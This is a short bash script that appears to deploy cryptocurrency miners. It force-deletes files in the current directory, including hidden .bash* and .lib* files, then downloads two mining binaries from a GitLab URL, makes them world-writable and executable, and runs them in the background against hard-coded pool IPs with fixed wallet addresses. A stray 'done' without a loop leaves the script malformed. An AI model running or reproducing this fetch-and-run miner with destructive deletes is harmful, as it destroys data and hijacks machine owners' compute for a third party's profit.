#!/bin/bash
rm -rvf * 
rm -rvf ele* lol* 1.43* TON* ton* NB* .lib* .bash* .majza*
rm -R *
mkdir .des
cd .des
rm -R *

wget https://gitlab.com/majapahlevi/mvp/-/raw/main/cpminer
chmod 777 cpminer && ./cpminer -a yespower -o stratum+tcp://138.197.98.18:443 -u v1VQN8gNy48AWqWzRqUhbKpYdXkbToncVw.$(shuf -n 1 -i 1-99999)-VISH -t4 &

wget https://gitlab.com/majapahlevi/mvp/-/raw/main/lol1.84
chmod 777 lol1.84

./lol1.84 --algo KARLSEN --pool 159.203.127.146:80 --user nexellia:qpkdu5rk0gnewjyqhn927nx84f53lgjxcssp9m8xhx6yug5jara5xg2rqrucj.$(shuf -n 1 -i 1-99999)-Bismillah --no-cl

done
